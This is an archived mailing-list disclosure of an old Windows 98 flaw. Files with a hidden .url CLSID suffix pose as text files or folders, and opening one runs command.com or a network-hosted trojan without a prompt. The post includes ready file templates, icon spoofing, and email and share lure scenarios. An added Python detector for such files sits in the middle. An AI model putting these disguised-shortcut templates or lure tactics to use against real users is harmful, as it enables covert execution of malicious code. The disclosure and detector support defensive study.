There is a possibility to run a program (e.g. a trojan) without confirmation and even without suspicion...

Exploring the registry I've found 2 interesting CLSIDs. The first one is the CLSID of the .lnk file:

.lnk file: {00021401-0000-0000-C000-000000000046}

I wouldn't stop on this, 'cause it's a binary file, and if you have certain utils you can try to find something useful out of this. I found a much easier way to use the CLSID bug, and here it is: the CLSID of the .url file.

.url file: {FBF23B40-E3F0-101B-8488-00AA003E56F8}

If someone creates a file, e.g.

==== CreditCard.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} ====
[InternetShortcut]
URL=file://c:/command.com
========================= END OF FILE =========================

a double-click on this file in Explorer will launch the MS-DOS Prompt. But... in Explorer that file will have the icon of a .url file. There is a way to fix it, and it can be done by adding some lines to the file. Now the file looks like this:

==== CreditCard.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} ====
[InternetShortcut]
URL=file://c:/command.com
IconIndex=-152
IconFile=shell32.dll
========================= END OF FILE =========================

Now the file in Explorer will be visible with the normal .txt-file icon (you can change IconIndex and/or IconFile for another icon), and when someone clicks on it he thinks it's a normal text file, but as the result of double-clicking the MS-DOS Prompt will pop up, without any confirmations(!!!).

But that's not all... If the hacker is on the same network as the possible victim (or he has access to a computer on the victim's network), there is the possibility to run the hacker's program directly from the network.
For this purpose he can use the following file:

==== master.passwd.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} ====
[InternetShortcut]
URL=file://ourcomp/ourshare/path/to/trojan.exe
IconIndex=-152
IconFile=shell32.dll
=========================== END OF FILE ==========================

where ourcomp is the name of the hacker's computer on the victim's network, ourshare is the name of the shared folder on that computer, and as you can guess path/to is the path to trojan.exe on that share. And after double-clicking, guess what MS Explorer will do??? CORRECT!!! It'll run trojan.exe WITHOUT ANY CONFIRMATIONS!!!!

Now if the hacker is smart enough to write a trojan program that does some crazy things and then creates a file master.passwd.txt (without CLSID) on the victim's computer and opens it with Notepad, the victim won't even have a suspicion of the trick ;-)

Tested on Win98, IE5.0.

I don't know how IE would behave if that file is accessed from <a href="...">, but I tried it on localhost this way: in the IE location bar I typed "file://X:/XPL/CLSID/master.passwd.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8}", and... IE executed trojan.exe ;-). From <a href="..."> it didn't work.

WORKAROUND

1. View file properties before opening any innocent-looking files in Explorer (not realistic).
2. Remove from the registry all CLSIDs of .url and .lnk, but this may cause the system to work improperly.
3. Do not use Explorer to open files. You can use Far Manager, Windows Commander, etc. as I do.

> Yet while valid the vulnerabilities are not particularly
> threatening. For the vulnerability to be exploited an attacker must
> somehow place a file somewhere the user is likely to find it and
> somehow entice him to "open" it by clicking on it.

That's why an attacker should name files master.passwd.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8}, or something like that.
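As an added example (not part of the original post), a small Python check a defender can run over a share or an attachment folder to surface files that use this trick: it strips the CLSID suffix that Explorer hides, reads the real URL= target of an Internet Shortcut, and notes whether the icon was overridden or the name padded with spaces. SAMPLE_FILES is constructed input; KNOWN_CLSIDS holds only the two CLSIDs quoted in the post.

```python
import re

# The two CLSIDs quoted in the post. Explorer hides a trailing ".{CLSID}" and
# hands the file to that class's handler instead of the visible extension.
KNOWN_CLSIDS = {
    "{FBF23B40-E3F0-101B-8488-00AA003E56F8}": "url",   # Internet Shortcut
    "{00021401-0000-0000-C000-000000000046}": "lnk",   # Shell Link
}
CLSID_SUFFIX = re.compile(
    r"\.(\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\})$", re.I)

def parse_internet_shortcut(text):
    """Minimal reader for the key=value lines under [InternetShortcut]."""
    values, inside = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            inside = line.lower() == "[internetshortcut]"
        elif inside and "=" in line:
            key, _, val = line.partition("=")
            values[key.strip().lower()] = val.strip()
    return values

def inspect_file(name, content):
    """Return a finding dict if `name` carries a hidden CLSID suffix, else None."""
    m = CLSID_SUFFIX.search(name)
    if not m:
        return None
    clsid = m.group(1).upper()
    shown = name[: m.start()]            # the part Explorer actually displays
    finding = {
        "shown_name": shown.strip(),
        "handler": KNOWN_CLSIDS.get(clsid, "unknown"),
        "padded": shown != shown.strip() or "  " in shown,  # space-padding trick
        "target": None,
        "icon_overridden": False,
    }
    if finding["handler"] == "url":      # .url handler: read the real target
        ini = parse_internet_shortcut(content)
        finding["target"] = ini.get("url")
        finding["icon_overridden"] = "iconfile" in ini or "iconindex" in ini
    return finding

# Constructed sample entries: the post's disguised shortcut plus a benign file.
SAMPLE_FILES = [
    ("CreditCard.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8}",
     "[InternetShortcut]\nURL=file://c:/command.com\n"
     "IconIndex=-152\nIconFile=shell32.dll\n"),
    ("notes.txt", "just a text file\n"),
]
```

Running inspect_file over every (name, content) pair in a folder and alerting on any non-None result with a file:// target or an overridden icon is the detection; a .lnk hit only reports the hidden handler, since the binary format is not parsed here.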
But there is an even more dangerous way: we can name our file passwords.{FBF23B40-E3F0-101B-8488-00AA003E56F8} and change its icon to the icon of a Folder, so the victim would think she's opening a Folder. If we place the file on our shared folder and then somehow invite the victim to that share (e.g. to download Document.doc), and if the victim is curious, she'll notice the folder "passwords" and would go to see the passwords ;-)

Here are some scenarios by Elias Levy (aka Aleph One):

> I can think of a couple of scenarios where this may be possible. The
> most appealing is one where an attacker has obtained access to a
> file server used by the user and places a malicious file in the
> share. If the user finds the file and opens it the attack can
> leverage his access to the file server into access to the victim's
> machine.
>
> Another scenario may be to use some vulnerability that allows an
> attacker to create, but not execute or overwrite other files, in a
> victim's machine. He can place the file on the victim's machine via
> the vulnerability but must wait for him to open the file.
>
> Another scenario may transfer the file into a victim's machine via an
> email message. The attacker may be able to fool the mail client not
> to display the full file name of the file, which the victim then
> saves, and opens. Maybe we can use the trick of padding the file
> name with spaces between the "txt" and ".{..." parts so that the
> filename is truncated when displayed to the user.

And here are some scenarios by me:

If I know the victim (I mean that I know her e-mail, and I've got at least one letter from the victim), then I can check X-Mailer in the headers of the victim's letters. Now, if I'm sure that the victim uses The Bat!, then I use this scenario: I send an e-mail to the victim with trojan.exe attached. Clearly the victim will delete that message, but... that file (trojan.exe) will remain on the victim's computer until the message is deleted from the Trash folder.
And all attachments of this type (non-text) are stored in the following folder on the victim's machine:

C:\Program Files\The Bat!\Mail\Victim's Name\Attach\

So now I can use a file with the CLSID extension to run the program C:\Program Files\The Bat!\Mail\Victim's Name\Attach\trojan.exe on the victim's machine.

If the victim uses Outlook Express, you can use aleph1's trick with spaces before the second extension. But... Outlook will show:

1. The icon of the file as an Internet Shortcut
2. All spaces and the CLSID extension when the victim tries to open it.

The other trick is to place spaces before the entire name of the file. In my case the file was named big2.txt.{...CLSID...}, and I placed 58 spaces, so Outlook showed it like "big2.txt...". I don't think this is a usage of the CLSID bug, 'cause this way we can send any .exe file, etc...

By the way, if there are a lot of spaces before the name of the file, Explorer begins to do some crazy things:

1. It doesn't show the name of the file (spaces).
2. After selecting the file and switching from Explorer to Explorer, it shows the name of the file (e.g. master.passwd.txt) not in the selected region, but nearly 30 pixels lower. And then when you drag that file, the name will remain in the same place ;-))

I'll try to find out some tricks with the .lnk CLSID, so bye for now...

EnJoY!

with Best regards,
[Co]Proc, procat_private

brought 2 U by [HtR]team, teamat_private:
EforeZZ - eforezzat_private, The LNU, Lviv, Ukraine
[Co]Proc - procat_private, The KPI, Kiev, Ukraine
This archive was generated by hypermail 2b30 : Wed Apr 25 2001 - 19:02:28 PDT